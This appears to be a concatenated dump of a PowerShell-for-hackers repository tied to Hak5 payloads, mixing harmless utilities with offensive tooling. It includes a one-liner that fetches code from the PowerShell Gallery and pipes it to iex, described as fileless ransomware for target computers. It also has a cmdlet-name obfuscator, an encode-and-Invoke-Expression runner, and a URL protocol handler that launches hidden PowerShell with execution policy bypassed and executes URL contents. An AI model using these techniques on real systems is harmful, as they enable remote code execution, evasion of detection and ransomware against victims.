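    # statement is replaced as a whole anyway.
    $outermost = @()
    $coveredUntil = -1
    foreach ($target in $targets) {
        if ($target.Extent.StartOffset -ge $coveredUntil) {
            $outermost += $target
            $coveredUntil = $target.Extent.EndOffset
        }
    }

    # Escape the value for a single-quoted literal (covers ' and the typographic
    # quote characters PowerShell also accepts as string delimiters)
    $escaped = [System.Management.Automation.Language.CodeGeneration]::EscapeSingleQuotedStringContent($NewValue)
    $replacement = "`$$VariableName = '$escaped'"

    # Replace from the end of the file backwards so earlier offsets stay valid
    for ($i = $outermost.Count - 1; $i -ge 0; $i--) {
        $extent = $outermost[$i].Extent
        $script = $script.Remove($extent.StartOffset, $extent.Text.Length)
        $script = $script.Insert($extent.StartOffset, $replacement)
    }

    # Write the updated script back to the file
    [System.IO.File]::WriteAllText($FilePath, $script)
    Write-Output "Updated `$$VariableName variable in $FilePath"
}

# Usage example
Update-VariableValue -VariableName "lastUpdate" -NewValue "cookies"
-------------------------------------------------------------------------------- /VideoNotes/htmlRenderer.ps1: -------------------------------------------------------------------------------- 1 | # Load required assemblies 2 | Add-Type -AssemblyName System.Windows.Forms 3 | Add-Type -AssemblyName System.Drawing 4 | 5 | # Create the form 6 | $form = New-Object System.Windows.Forms.Form 7 | $form.Size = New-Object System.Drawing.Size(800,600) 8 | $form.Text = "Live HTML Renderer" 9 | $form.MinimumSize = New-Object System.Drawing.Size(800,600) 10 | 11 | # Create a menu with a full-screen option 12 | $menu = New-Object System.Windows.Forms.MainMenu 13 | $menuItem = $menu.MenuItems.Add("View") 14 | $menuItemFullScreen = $menuItem.MenuItems.Add("Toggle Full-Screen") 15 | $menuItemFullScreen.add_Click({ 16 | $form.WindowState = if ($form.WindowState -eq 'Normal') { 'Maximized' } else { 'Normal' } 17 | }) 18 | 19 | $form.Menu = $menu 20 | 21 | 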
# Create the text area 22 | $textArea = New-Object System.Windows.Forms.RichTextBox 23 | $textArea.Location = New-Object System.Drawing.Point(10,10) 24 | $textArea.Size = New-Object System.Drawing.Size(380,580) 25 | $textArea.Anchor = 'Top,Left,Bottom' 26 | $textArea.Multiline = $true 27 | $textArea.ScrollBars = 'Vertical' 28 | $form.Controls.Add($textArea) 29 | 30 | # Create the WebBrowser control 31 | $webBrowser = New-Object System.Windows.Forms.WebBrowser 32 | $webBrowser.Location = New-Object System.Drawing.Point(400,10) 33 | $webBrowser.Size = New-Object System.Drawing.Size(380,580) 34 | $webBrowser.Anchor = 'Top,Right,Bottom' 35 | $form.Controls.Add($webBrowser) 36 | 37 | # Function to render HTML 38 | $renderHtml = { 39 | $webBrowser.DocumentText = $textArea.Text 40 | } 41 | 42 | # Set event handler for text change 43 | $textArea.add_TextChanged($renderHtml) 44 | 45 | # Show the form 46 | $form.ShowDialog() 47 | -------------------------------------------------------------------------------- /VideoNotes/polyglot.md: -------------------------------------------------------------------------------- 1 | | File Type | Beginning Signature (Hex) | Ending Signature (Hex) | 2 | |-----------------|------------------------------------------|-------------------------------| 3 | | JPEG | `FF D8` | `FF D9` | 4 | | PNG | `89 50 4E 47 0D 0A 1A 0A` | *No specific ending* | 5 | | GIF | `47 49 46 38 39 61` or `47 49 46 38 37 61` | *No specific ending* | 6 | | TIFF (little endian) | `49 49 2A 00` | *Varies* | 7 | | TIFF (big endian) | `4D 4D 00 2A` | *Varies* | 8 | | BMP | `42 4D` | *No specific ending* | 9 | | PDF | `25 50 44 46` | `%%EOF` (in ASCII) | 10 | | ZIP | `50 4B 03 04` or `50 4B 05 06` (empty archive) or `50 4B 07 08` (spanned archive) | *No specific ending* | 11 | | RAR | `52 61 72 21 1A 07 00` | *No specific ending* | 12 | | 7z | `37 7A BC AF 27 1C` | *No specific ending* | 13 | | MP3 (with ID3 tag) | `49 44 33` | *No specific ending* | 14 | | WAV | `52 49 46 46` 
followed by file size and `57 41 56 45` | *No specific ending* | 15 | | AVI | `52 49 46 46` followed by file size and `41 56 49 20` | *No specific ending* | 16 | | MP4 | `00 00 00 18 66 74 79 70` (varies) | *No specific ending* | 17 | | MKV | `1A 45 DF A3` | *No specific ending* | 18 | | FLV | `46 4C 56 01` | *No specific ending* | 19 | -------------------------------------------------------------------------------- /VideoNotes/Convert-Cmdlet.md: -------------------------------------------------------------------------------- 1 | # Convert-Cmdlet Function 2 | 3 | ## Description 4 | The `Convert-Cmdlet` function is a PowerShell utility designed to encode the names of PowerShell cmdlets. It replaces each character in a given cmdlet name with an index from a randomized set of valid characters, then constructs a new string representation of that cmdlet. 5 | 6 | ## Usage 7 | 8 | ### Syntax 9 | ```powershell 10 | $result = Convert-Cmdlet -cmdlet '' 11 | ``` 12 | 13 | ### Parameters 14 | - `-cmdlet`: The name of the PowerShell cmdlet you want to convert. 

### Examples
```powershell
# Convert the cmdlet 'Get-Process'
$encodedCmdlet = Convert-Cmdlet -cmdlet 'Get-Process'
Write-Host $encodedCmdlet
```

## Function Code
```powershell
function Convert-Cmdlet {
    <#
    .SYNOPSIS
    Rewrites a cmdlet name as a call-operator expression that indexes into a shuffled alphabet.
    .DESCRIPTION
    Returns text only; nothing is executed here. The shuffled alphabet is embedded in the
    returned string next to the index list, so the original name can be recovered by
    evaluating the bracketed index expression on its own.
    .PARAMETER cmdlet
    The cmdlet name to rewrite. Characters outside [-0-9A-Za-z] are skipped without an error.
    .OUTPUTS
    System.String of the form: & (("<shuffled alphabet>")[i,j,k,...] -join '')
    #>
    param (
        [string]$cmdlet
    )

    # Shuffle every character allowed in a cmdlet name; a new order is drawn on each call
    $shuffled = '-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'.ToCharArray() |
        Sort-Object { Get-Random }
    $valid = $shuffled -join ''
    $lookup = $valid.ToCharArray()

    # Record where each input character sits in the shuffled alphabet
    $positions = foreach ($letter in $cmdlet.ToCharArray()) {
        if ($letter -in $lookup) {
            [array]::IndexOf($lookup, $letter)
        }
    }

    # Emit the alphabet as a string literal followed by the index list
    return "& ((""$valid"")[$(@($positions) -join ',')] -join '')"
}
```

## Notes
- The function generates a unique encoding for each cmdlet based on a randomized set of valid characters.
- This encoding is primarily for demonstration purposes and should be tested before use in production environments.
51 | -------------------------------------------------------------------------------- /Assets/rev.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 9 | 10 | 11 | 12 | r.ToString()).ToArray()); 38 | 39 | Console.WriteLine(output); 40 | } 41 | } 42 | 43 | return true; 44 | } 45 | } 46 | 47 | ]]> 48 | 49 | 50 | 51 | 52 | -------------------------------------------------------------------------------- /VideoNotes/shortestAlias.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ```powershell 5 | function Replace-CmdletsWithAliases { 6 | param ( 7 | [Parameter(Mandatory)] 8 | [ScriptBlock]$ScriptBlock 9 | ) 10 | 11 | # Get a list of all cmdlets and their aliases 12 | $cmdletAliases = Get-Command -CommandType Cmdlet | 13 | ForEach-Object { 14 | $cmdletName = $_.Name 15 | $aliases = @(Get-Alias -Definition $cmdletName -ErrorAction SilentlyContinue).Name 16 | if ($aliases) { 17 | # Filter out single-letter aliases and select the most appropriate alias 18 | $appropriateAlias = $aliases | Where-Object { $_.Length -gt 1 } | Sort-Object Length | Select-Object -First 1 19 | if ($appropriateAlias) { 20 | [PSCustomObject]@{ 21 | Name = $cmdletName 22 | Alias = $appropriateAlias 23 | } 24 | } 25 | } 26 | } | Where-Object Alias 27 | 28 | 29 | # Convert the script block to string 30 | $scriptContent = $ScriptBlock.ToString() 31 | 32 | # Parse the script block into AST 33 | $ast = [System.Management.Automation.Language.Parser]::ParseInput($scriptContent, [ref]$null, [ref]$null) 34 | 35 | # Find all command elements 36 | $commandElements = $ast.FindAll({ $args[0] -is [System.Management.Automation.Language.CommandAst] }, $true) 37 | 38 | foreach ($command in $commandElements) { 39 | $cmdletName = $command.GetCommandName() 40 | $aliasMapping = $cmdletAliases | Where-Object { $_.Name -eq $cmdletName } 41 | 42 | if ($aliasMapping) { 43 | # Replace cmdlet name with alias 44 | 
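$scriptContent = $scriptContent -replace "\b$cmdletName\b", $aliasMapping.Alias 45 | } 46 | } 47 | 48 | return $scriptContent 49 | } 50 | 51 | ``` 52 |
--------------------------------------------------------------------------------
/VideoNotes/passwordEncryption.md:
--------------------------------------------------------------------------------
# File Encryption and Decryption Tutorial Using PowerShell

This tutorial demonstrates how to encrypt and decrypt files using PowerShell and the .NET Framework's AES encryption.

## Prerequisites

- PowerShell
- Basic understanding of scripting
- A file to encrypt and decrypt

## PowerShell Script

```powershell
# Load necessary assembly for encryption
Add-Type -AssemblyName System.Security

# Encryption Process
# Creating AES encryption provider with a fresh random key and IV.
# The provider defaults are used (CBC mode, PKCS7 padding): this gives confidentiality only.
# Nothing below detects a ciphertext that was modified after encryption; pair the output with
# an HMAC over the IV and ciphertext if integrity matters.
$aes = New-Object System.Security.Cryptography.AesCryptoServiceProvider
try {
    $aes.GenerateKey()
    $aes.GenerateIV()

    # Reading the file to encrypt
    $plaintextBytes = [System.IO.File]::ReadAllBytes("path\\to\\your\\file")

    # Encrypting the data
    $encryptor = $aes.CreateEncryptor($aes.Key, $aes.IV)
    try {
        $encryptedBytes = $encryptor.TransformFinalBlock($plaintextBytes, 0, $plaintextBytes.Length)
    }
    finally {
        $encryptor.Dispose()
    }

    # Writing the encrypted data to a new file
    [System.IO.File]::WriteAllBytes("path\\to\\encrypted\\file", $encryptedBytes)

    # Saving the key and IV for decryption
    # Base64 is an encoding, not protection: whoever can read the key file can decrypt the data.
    # Keep the key file away from the encrypted file and restrict its ACL; the IV is not secret.
    $key = [Convert]::ToBase64String($aes.Key)
    $IV = [Convert]::ToBase64String($aes.IV)
    $key | Out-File "path\\to\\keyfile"
    $IV | Out-File "path\\to\\ivfile"
}
finally {
    # Dispose releases the provider and clears the key material it holds
    $aes.Dispose()
}

# Decryption Process
# Setting up AES decryption provider from the saved key and IV files, so this part also works
# in a new session where $key and $IV no longer exist
$aesDecryptor = New-Object System.Security.Cryptography.AesCryptoServiceProvider
try {
    $aesDecryptor.Key = [Convert]::FromBase64String((Get-Content "path\\to\\keyfile" -Raw).Trim())
    $aesDecryptor.IV = [Convert]::FromBase64String((Get-Content "path\\to\\ivfile" -Raw).Trim())

    # Reading the encrypted file
    $encryptedBytes = [System.IO.File]::ReadAllBytes("path\\to\\encrypted\\file")

    # Decrypting the data
    $decryptor = $aesDecryptor.CreateDecryptor($aesDecryptor.Key, $aesDecryptor.IV)
    try {
        $decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length)
    }
    finally {
        $decryptor.Dispose()
    }

    # Writing the decrypted data to a file
    [System.IO.File]::WriteAllBytes("path\\to\\decrypted\\file", $decryptedBytes)
}
finally {
    $aesDecryptor.Dispose()
}
```
--------------------------------------------------------------------------------
/Assets/images/hello.svg:
--------------------------------------------------------------------------------
1 | 2 | 3 |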
4 | 60 | 61 |
62 |

Hi there, my name is Nikola
👋

63 |
64 |
65 |
66 |
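--------------------------------------------------------------------------------
/VideoNotes/compression.md:
--------------------------------------------------------------------------------
# PowerShell Command Encoder/Decoder

This README explains the use of two PowerShell functions: `Encode-Command` and `Decode-Command`. The `Encode-Command` function is used to compress and Base64 encode a PowerShell command, while the `Decode-Command` function decodes and executes the encoded command.

## Encode-Command Function

This function compresses a given PowerShell command using Gzip and encodes it in Base64.

Usage
To use these functions:

Encode a command: `$encoded = Encode-Command -Command 'Write-Output "Hello, World!"'`
Decode and execute the command: `Decode-Command -EncodedCommand $encoded`

```powershell
function Encode-Command {
    <#
    .SYNOPSIS
    Gzip-compresses a command string and returns the result as Base64 text.
    .DESCRIPTION
    This is an encoding, not encryption: anyone holding the returned string can
    recover the command with a Base64 decode followed by gunzip.
    .PARAMETER Command
    The command text to encode.
    .OUTPUTS
    System.String - Base64 of the gzip stream.
    #>
    param(
        [Parameter(Mandatory=$true)]
        [string]$Command
    )

    # Convert command to byte array. UTF-8 keeps non-ASCII characters intact;
    # the ASCII encoder replaces every one of them with '?'.
    $byteArray = [System.Text.Encoding]::UTF8.GetBytes($Command)

    # Compress the byte array
    $memoryStream = New-Object System.IO.MemoryStream
    try {
        $gzipStream = New-Object System.IO.Compression.GzipStream $memoryStream, ([System.IO.Compression.CompressionMode]::Compress)
        try {
            $gzipStream.Write($byteArray, 0, $byteArray.Length)
        }
        finally {
            # Closing writes the gzip trailer, so it has to happen before ToArray()
            $gzipStream.Close()
        }

        # Convert compressed data to Base64
        return [Convert]::ToBase64String($memoryStream.ToArray())
    }
    finally {
        $memoryStream.Close()
    }
}
```

```powershell
function Decode-Command {
    <#
    .SYNOPSIS
    Base64-decodes and gunzips a string produced by Encode-Command, then executes it.
    .PARAMETER EncodedCommand
    Base64 text of a gzip stream that holds the command.
    .OUTPUTS
    Whatever the decoded command writes to the pipeline.
    #>
    param(
        [Parameter(Mandatory=$true)]
        [string]$EncodedCommand
    )

    # Convert from Base64 to byte array
    $decodedBytes = [Convert]::FromBase64String($EncodedCommand)

    # Decompress the byte array
    $memoryStream = New-Object System.IO.MemoryStream($decodedBytes, 0, $decodedBytes.Length)
    try {
        $gzipStream = New-Object System.IO.Compression.GzipStream($memoryStream, [System.IO.Compression.CompressionMode]::Decompress)
        try {
            $streamReader = New-Object System.IO.StreamReader($gzipStream, [System.Text.Encoding]::UTF8)
            $decompressedCommand = $streamReader.ReadToEnd()
        }
        finally {
            $gzipStream.Close()
        }
    }
    finally {
        $memoryStream.Close()
    }

    # NOTE(review): Invoke-Expression runs whatever text was decoded, with the caller's
    # privileges. Only pass strings that were produced locally by Encode-Command; the
    # encoding carries no signature, so the origin of a string cannot be checked here.
    # With Script Block Logging enabled (event ID 4104) the decoded text is recorded
    # when it is executed.
    Invoke-Expression $decompressedCommand
}
```
--------------------------------------------------------------------------------
/Assets/template.md:
--------------------------------------------------------------------------------
1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |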
5 | Table of Contents 6 |
    7 |
  1. Description
  2. 8 |
  3. The Function
  4. 9 |
  5. Examples
  6. 10 |
  7. Contact
  8. 11 |
  9. Acknowledgments
  10. 12 |
13 |
14 | 15 | # Name of your function 16 | 17 | ## Description 18 | 19 | A short description of what your function accomplishes 20 | 21 | ## The Function 22 | 23 | ### [FUNCTION-NAME] 24 | 25 | A short description of how your function works 26 | 27 | ``` 28 | function YOUR-FUNCTION { 29 | 30 | } 31 | ``` 32 | 33 |

(back to top)

34 | 35 | 36 | ## Examples 37 | [//]: # (Examples of scripts that have used your function) 38 | Listed below are payloads that have used one of these functions: 39 | 40 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 41 | 42 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 43 | 44 | 45 |

(back to top)

46 | 47 | 48 | ## Contact 49 | 50 | I am Jakoby 51 |


52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 |

72 | 73 | 74 | 75 |

(back to top)

76 | 77 | 78 | ## Acknowledgments 79 | 80 | * [Hak5](https://hak5.org/) 81 | * [UberGuidoZ](https://github.com/UberGuidoZ) 82 | 83 | *** 84 | 85 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 86 | 87 |

(back to top)

88 | -------------------------------------------------------------------------------- /Assets/Scripts/Powershell-2-Ducky/ReadMe.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
  2. 8 |
  3. The Function
  4. 9 |
  5. Examples
  6. 10 |
  7. Contact
  8. 11 |
  9. Acknowledgments
  10. 12 |
13 |
14 | 15 | # Name of your function 16 | 17 | ## Description 18 | 19 | A short description of what your function accomplishes 20 | 21 | ## The Function 22 | 23 | ### [FUNCTION-NAME] 24 | 25 | A short description of how your function works 26 | 27 | ``` 28 | function YOUR-FUNCTION { 29 | 30 | } 31 | ``` 32 | 33 |

(back to top)

34 | 35 | 36 | ## Examples 37 | [//]: # (Examples of scripts that have used your function) 38 | Listed below are payloads that have used one of these functions: 39 | 40 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 41 | 42 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 43 | 44 | 45 |

(back to top)

46 | 47 | 48 | ## Contact 49 | 50 | I am Jakoby 51 |


52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 |

72 | 73 | 74 | 75 |

(back to top)

76 | 77 | 78 | ## Acknowledgments 79 | 80 | * [Hak5](https://hak5.org/) 81 | * [UberGuidoZ](https://github.com/UberGuidoZ) 82 | 83 | *** 84 | 85 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 86 | 87 |

(back to top)

88 | -------------------------------------------------------------------------------- /Functions/Def_Protocol_HNDLR.md: -------------------------------------------------------------------------------- 1 | ```powershell 2 | New-Item -Path "HKCR:\ps" -Force | Out-Null 3 | New-ItemProperty -Path "HKCR:\ps" -Name "(Default)" -Value "URL:ps Protocol" -PropertyType String -Force | Out-Null 4 | New-ItemProperty -Path "HKCR:\ps" -Name "URL Protocol" -Value "" -PropertyType String -Force | Out-Null 5 | New-ItemProperty -Path "HKCR:\ps\shell\open\command" -Name "(Default)" -Value '"$env:userprofile\Documents\myhandler.ps1" "%1"' ` 6 | -PropertyType String -Force | Out-Null 7 | ``` 8 | 9 | 10 | 11 | ```powershell 12 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w h -Ep Bypass -File "$env:userprofile\Documents\myhandler.ps1" "%1" 13 | ``` 14 | 15 | 16 | ```powershell 17 | # Extract the URI from the command-line arguments 18 | $webURL = $args[0] 19 | 20 | # Define a function to convert URL-encoded characters to their ASCII value 21 | function Convert-UrlEncodedToAscii { 22 | param( 23 | [Parameter(Mandatory=$true)][string]$UrlEncodedString 24 | ) 25 | 26 | # Decode the URL-encoded string to plain text 27 | $decoded = [System.Uri]::UnescapeDataString($UrlEncodedString) 28 | 29 | # Define a regular expression to match URL-encoded characters 30 | $regex = '%([0-9a-fA-F]{2})' 31 | 32 | # Loop through all matches of URL-encoded characters and replace them with their ASCII value 33 | $asciiString = "" 34 | ([regex]$regex).Matches($decoded) | ForEach-Object { 35 | $asciiValue = [int][byte]::Parse($_.Groups[1].Value, "HexNumber") 36 | $asciiString += [char]$asciiValue 37 | } 38 | 39 | # Remove all URL-encoded characters from the decoded string 40 | $remainingString = $decoded.Replace($regex, '') 41 | 42 | # Trim the string up to the first occurrence of "//" 43 | $index = $remainingString.IndexOf("//") 44 | if ($index -ge 0) { 45 | $remainingString = 
$remainingString.Substring($index + 2) 46 | } 47 | 48 | # Combine the ASCII string and the remaining string 49 | $decodeOutput = $asciiString + $remainingString 50 | 51 | # Trim the last character from the string 52 | $decodeOutput = $decodeOutput.Substring(0, $decodeOutput.Length - 1) 53 | 54 | # Return the decoded and trimmed string 55 | return $decodeOutput 56 | } 57 | 58 | # Call the function to convert the URL-encoded characters in the input URL to ASCII 59 | $fullASCII = Convert-UrlEncodedToAscii $webURL 60 | 61 | # Output the decoded and trimmed string in red text 62 | Write-Host $fullASCII -ForegroundColor Red 63 | 64 | # Execute a PowerShell command using the decoded and trimmed string as input 65 | $CMD = "powershell.exe $fullASCII" 66 | $CMD | iex 67 | 68 | ``` 69 | -------------------------------------------------------------------------------- /VideoNotes/cGpt.txt: -------------------------------------------------------------------------------- 1 | # powerGallery 2 | 3 | This one liner will load the neccessary files to encrypt a system straight from the trusted powershellgallery.com website. 4 | Used in conjunction with a simple for loop its is now fileless ransomware hosted and executed from your platform 5 | 6 | ```powershell 7 | ([regex]::Matches((irm "https://www.powershellgallery.com/packages/PSAES/1.0.0.5/Content/Protect-AESMessage.ps1"),'(?<=).*?(?=<\/td>)','s').Value|%{[System.Net.WebUtility]::HtmlDecode($_)})-replace'<[^>]*>'-replace'^\s*',''-replace '[^\x20-\x7E]'|iex 8 | ``` 9 | 10 | Next its as simple as running the commands stored in that module agaisnt the system 11 | In this instance we can encrypt a string, but why stop there? 12 | 13 | ```powershell 14 | $encryptedMessage = Protect-AESMessage -Message "Sensitive Data" -Password "89c57yj78754cth8" 15 | ``` 16 | 17 | Combining them into a simple one liner. 
Together with yet another simple functionality the `for loop` you should be able to see the danger 18 | We could run fileless ransomware on a target computer all from a trusted source 19 | 20 | ```powershell 21 | ([regex]::Matches((irm "https://www.powershellgallery.com/packages/PSAES/1.0.0.5/Content/Protect-AESMessage.ps1"),'(?<=).*?(?=<\/td>)','s').Value|%{[System.Net.WebUtility]::HtmlDecode($_)})-replace'<[^>]*>'-replace'^\s*',''-replace '[^\x20-\x7E]'|iex;$encryptedMessage = Protect-AESMessage -Message "Sensitive Data" -Password "89c57yj78754cth8" 22 | ``` 23 | 24 | You can use this function to grab the links of all the .ps1 files in a module from the powershell gallery website 25 | 26 | ```powershell 27 | function Get-Ps1Urls { 28 | param ([string]$Url) 29 | try { 30 | $content = Invoke-RestMethod -Uri $Url 31 | $regex = ']*href="([^"]+\.ps1)"[^>]*>' 32 | $matches = [regex]::Matches($content, $regex) 33 | $baseURL = "https://www.powershellgallery.com" 34 | $ps1Links = @() 35 | foreach ($match in $matches) { 36 | $relativeLink = $match.Groups[1].Value 37 | $fullLink = $baseURL + $relativeLink 38 | $ps1Links += $fullLink 39 | } 40 | return $ps1Links 41 | } 42 | catch { 43 | Write-Error "An error occurred: $_" 44 | } 45 | } 46 | ``` 47 | 48 | Syntax: 49 | 50 | ```powershell 51 | $urls = get-Ps1Urls -Url "https://www.powershellgallery.com/packages/PSAES/1.0.0.5" 52 | ``` 53 | 54 | 55 | ```powershell 56 | $urls = @("https://www.powershellgallery.com/packages/PSAES/1.0.0.5/Content/Protect-AESMessage.ps1") 57 | 58 | foreach ($url in $urls){([regex]::Matches((irm "$url"), '(?<=).*?(?=<\/td>)', 's').Value|%{[System.Net.WebUtility]::HtmlDecode($_)})-replace'<(?!#)[^>]+>|(?(?![^#])',''} 59 | ``` 60 | -------------------------------------------------------------------------------- /VideoNotes/Convert-ImageToHtml.ps1: -------------------------------------------------------------------------------- 1 | function Convert-ImageToHtml 2 | { 3 | <# 4 | .SYNOPSIS 5 | This 
function can be used to convert an image file into an HTML IMG tag with an image 6 | embedded in the SRC so that an external image file doesn't have to be referenced. 7 | .PARAMETER $ImageFile 8 | The image file path. 9 | .PARAMETER $MakeHtml 10 | An HTML file will be created using the same name as the image file. 11 | .EXAMPLE 12 | Convert a single image file to an HTML IMG tag and display the code. 13 | PS C:\> Convert-ImageToHtml -$ImageFile c:\temp\picture.png -Verbose 14 | .EXAMPLE 15 | Convert a directory of images to HTML IMG tags and display the code. 16 | PS C:\> Get-ChildItem *.png | select fullname | Convert-ImageToHtml -Verbose 17 | .EXAMPLE 18 | Convert a directory of images to HTML IMG tags, display the code, and write them to html files. 19 | PS C:\> Get-ChildItem *.png | select fullname | Convert-ImageToHtml -Verbose -MakeHtml 20 | .NOTES 21 | Author: Scott Sutherland (@_nullbind) 22 | #> 23 | 24 | [CmdletBinding()] 25 | Param( 26 | [Parameter(Mandatory = $true, 27 | ValueFromPipeline = $true, 28 | ValueFromPipelineByPropertyName = $true, 29 | HelpMessage = 'The image file path.')] 30 | [string]$ImageFile, 31 | 32 | [Parameter(Mandatory = $false, 33 | HelpMessage = 'An HTML file will be created using the same name as the image file.')] 34 | [switch]$MakeHtml 35 | ) 36 | 37 | 38 | Process { 39 | 40 | try { 41 | 42 | # Process for common parameter names if pipeline is used 43 | if($PSCmdlet.MyInvocation.ExpectingInput){ 44 | $CheckFullName = $_ | gm | where name -like "fullname" 45 | if($CheckFullName){ 46 | $ImageFile = $_.fullname 47 | } 48 | } 49 | 50 | # Verbose info 51 | Write-Verbose "Processing $ImageFile" 52 | 53 | # Read image file 54 | $ImageBytes = [System.IO.File]::ReadAllBytes("$ImageFile") 55 | 56 | # Convert to base64 string 57 | $ImageString = [System.Convert]::ToBase64String($ImageBytes) 58 | 59 | # Create HTML with an embedded image 60 | $output = "" 61 | 62 | # Display image tag 63 | $output 64 | 65 | if($MakeHtml){ 66 | $output | 
Out-File "$ImageFile.html" 67 | } 68 | }catch{ 69 | Write-Error "Something went wrong. Check your paths. :)" -ErrorId B1 -TargetObject $_ 70 | } 71 | 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /Functions/DefaultBrowser.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
  2. 8 |
  3. The Function
  4. 9 |
  5. Examples
  6. 10 |
  7. Contact
  8. 11 |
  9. Acknowledgments
  10. 12 |
13 |
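
# Default Browser

## Description

This function will get the default browser of your target's PC

## The Function

### [Get-DefaultBrowser]

This function will make a call to the registry to get the default Browser using the following syntax:

`$DefaultBrowser = Get-DefaultBrowser`

```powershell
function Get-DefaultBrowser{
    <#
    .SYNOPSIS
    Returns the command line registered for the http protocol under HKLM\SOFTWARE\Classes.
    .DESCRIPTION
    Opens the LocalMachine hive through OpenRemoteBaseKey using the local host name and reads
    the (Default) value of SOFTWARE\Classes\http\shell\open\command.
    NOTE(review): this is the machine-wide http handler. A per-user default browser choice is
    kept under HKCU (...\UrlAssociations\http\UserChoice) and may differ - confirm which one
    the caller needs.
    .OUTPUTS
    The (Default) value of the command key, or $null when the key does not exist.
    #>

    # Param([parameter(Mandatory=$true)][alias("Computer")]$ComputerName)
    $ComputerName = hostname
    $Registry = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', $ComputerName)
    try {
        $RegistryKey = $Registry.OpenSubKey("SOFTWARE\\Classes\\http\\shell\\open\\command")

        # OpenSubKey returns $null when the key is missing; report that as "no value"
        if ($null -eq $RegistryKey) {
            return $null
        }

        try {
            #Get (Default) Value
            return $RegistryKey.GetValue("")
        }
        finally {
            $RegistryKey.Close()
        }
    }
    finally {
        # Release the hive handle on every path
        $Registry.Close()
    }
}
```
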

(back to top)

44 | 45 | 46 | ## Examples 47 | [//]: # (Examples of scripts that have used your function) 48 | Listed below are payloads that have used one of these functions: 49 | 50 | No payloads so far have used this function, please feel free to submit your own scripts that have used this function 51 | 52 | 53 |

(back to top)

54 | 55 | 56 | ## Contact 57 | 58 |

I am Jakoby

59 |


60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 |

80 | 81 | 82 | 83 |

(back to top)

84 | 85 | 86 | ## Acknowledgments 87 | 88 | * [Hak5](https://hak5.org/) 89 | * [UberGuidoZ](https://github.com/UberGuidoZ) 90 | 91 | *** 92 | 93 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 94 | 95 |

(back to top)

96 | -------------------------------------------------------------------------------- /VideoNotes/PsChat.md: -------------------------------------------------------------------------------- 1 | # PowerShell Chat Room Project 2 | 3 | ## Project Overview 4 | This project aims to create a chat system allowing communication between multiple computers using PowerShell, with a Linode server as an intermediary. 5 | 6 | ## Table of Contents 7 | - [Project Scope](#project-scope) 8 | - [Linode Server Setup](#linode-server-setup) 9 | - [Chat System Architecture](#chat-system-architecture) 10 | - [Server-side Application Development](#server-side-application-development) 11 | - [PowerShell Client Development](#powershell-client-development) 12 | - [Implementing Communication](#implementing-communication) 13 | - [Testing](#testing) 14 | - [Security and Reliability](#security-and-reliability) 15 | - [Documentation and Cleanup](#documentation-and-cleanup) 16 | - [Future Enhancements](#future-enhancements) 17 | 18 | ## Project Scope 19 | - **Objective:** Create a chat system with PowerShell clients and a Linode server. 20 | - **Technologies:** PowerShell, Linux server, optional database, and web server technology. 21 | - **Security:** Implement SSL/TLS for secure communication. 22 | 23 | ## Linode Server Setup 24 | 1. **Select a Linode Plan:** Choose a plan that fits the project needs. 25 | 2. **Install Linux:** Set up a Linux distribution like Ubuntu. 26 | 3. **Security Measures:** Configure firewalls and SSH keys. 27 | 4. **Install Software:** Install necessary software like Apache, Node.js, or Python. 28 | 29 | ## Chat System Architecture 30 | - **Model:** Use a client-server model for message handling. 31 | - **Protocol:** Choose a communication protocol (e.g., HTTP, WebSocket). 32 | 33 | ## Server-side Application Development 34 | 1. **Backend Logic:** Write a script to handle and broadcast messages. 35 | 2. 
**Database Setup (Optional):** Configure a database to store chat records. 36 | 37 | ## PowerShell Client Development 38 | 1. **Scripting:** Develop scripts for sending and receiving messages. 39 | 2. **Interface:** Create a text-based interface in PowerShell. 40 | 41 | ## Implementing Communication 42 | - **Sending Messages:** Code the functionality to send messages to the server. 43 | - **Receiving Messages:** Implement a method to receive new messages, like polling. 44 | 45 | ## Testing 46 | 1. **Local Network Testing:** Begin testing on a local network. 47 | 2. **Linode Server Testing:** Progress to testing with the Linode server. 48 | 49 | ## Security and Reliability 50 | - **Secure Data Transmission:** Implement SSL/TLS. 51 | - **Error Handling:** Add comprehensive error handling and logging. 52 | 53 | ## Documentation and Cleanup 54 | - **User Guide:** Write documentation on how to use the chat system. 55 | - **Code Refinement:** Refine and comment the code for better clarity. 56 | 57 | ## Future Enhancements 58 | - **Additional Features:** Consider private messaging, user authentication, or multiple chat rooms. 59 | - **Performance Optimization:** Focus on server performance and scalability. 
